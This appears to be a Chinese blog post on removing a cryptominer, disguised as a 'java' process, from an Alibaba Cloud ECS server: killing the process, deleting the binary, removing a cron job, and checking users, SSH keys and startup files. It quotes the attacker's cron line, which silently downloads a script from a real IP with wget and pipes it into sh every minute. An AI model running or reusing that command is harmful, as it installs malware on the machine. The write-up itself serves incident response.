阿里雲ECS遭挖礦程式攻擊解決方法(徹底清除挖礦程式,順便下載了挖礦程式的指令碼)
一:殺死挖礦程式程序
在伺服器上使用top指令檢視cpu的使用情況,發現有一個叫java的程式佔用cpu高達99.9%
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 373576 2720 404 S 99.9 0.1 1252:00 java 1 root 20 0 43208 3544 2420 S 0.0 0.2 0:04.52 systemd 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 S 0.0 0.0 0:00.08 ksoftirqd/0 5 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H 7 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
這個是挖礦程式偽裝成java程式,用jps檢視java程序的時候並沒有這個程式。
通過pkill 5778殺死程序
二:刪除挖礦程式
我們通過cd /proc/5778(這個java挖礦程式的pid)進入到這個程序的目錄然後通過ll命令檢視這個程序程式的位置
dr-xr-xr-x 2 root root 0 Oct 11 17:24 attr
-rw-r--r-- 1 root root 0 Oct 11 17:24 autogroup
-r-------- 1 root root 0 Oct 11 17:24 auxv
-r--r--r-- 1 root root 0 Oct 11 17:24 cgroup
--w------- 1 root root 0 Oct 11 17:24 clear_refs
-r--r--r-- 1 root root 0 Oct 10 20:18 cmdline
-rw-r--r-- 1 root root 0 Oct 11 17:24 comm
-rw-r--r-- 1 root root 0 Oct 11 17:24 coredump_filter
-r--r--r-- 1 root root 0 Oct 11 17:24 cpuset
lrwxrwxrwx 1 root root 0 Oct 11 17:24 cwd -> /
-r-------- 1 root root 0 Oct 11 17:24 environ
lrwxrwxrwx 1 root root 0 Oct 10 20:18 exe -> /var/tmp/java
dr-x------ 2 root root 0 Oct 10 20:18 fd
dr-x------ 2 root root 0 Oct 11 17:24 fdinfo
然後我們進入這個程式的目錄找到這個程式然後刪除
-rwxr-xr-x 1 root root 2386544 Oct 9 15:53 java
rm -rf java
不過做到這裡不久之後這個挖礦程式還是會死灰復燃
三:清除挖礦程式的定時任務
因為你的系統中已經被設定了一個定時任務,定時下載挖礦程式並執行
通過crontab -l 檢視該使用者下的所有定時任務
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
無時無刻的靜默執行這個cr.sh指令碼,還清除了記錄,真的是陰啊!
crontab -r 刪除定時任務
不過我好奇這個腳本里寫了什麼,於是乎修改了一下這個定時任務,把他的指令碼下載了下來,發現通過這個指令碼又執行了另一個指令碼,還得到了一個配置檔案,再加上偽裝成java的挖礦軟體,一共四個東西,我都上傳了,有興趣的可以下來看下。
最後提醒下,伺服器的一些高危埠千萬不要隨便開啟啊,如果用阿里雲搭建叢集的話可以配置安全組規則,針對於特定的主機開放埠,不要對所有ip開放埠。
四:檢查使用者列表,.ssh檔案,開機啟動
cat /etc/passwd 檢查是否有未知使用者
cat ~/.ssh/authrized_keys 檢查是否對未知使用者授權
cat known_hosts 檢查是否有未知的用host
/etc/rc.local /etc/rc.sysinit /etc/inittab /etc/profile 這些開機啟動的系統配置目錄下面可能有挖礦程式的指令碼,檢查一下
步驟簡化:
1.pkill java 殺掉挖礦程式的程序
2.rm -rf java 刪除挖礦程式
3.crontab -r 刪除定時任務
4.檢查使用者列表,開機啟動,.ssh檔案
5.去阿里雲控制檯設定安全組關閉不安全埠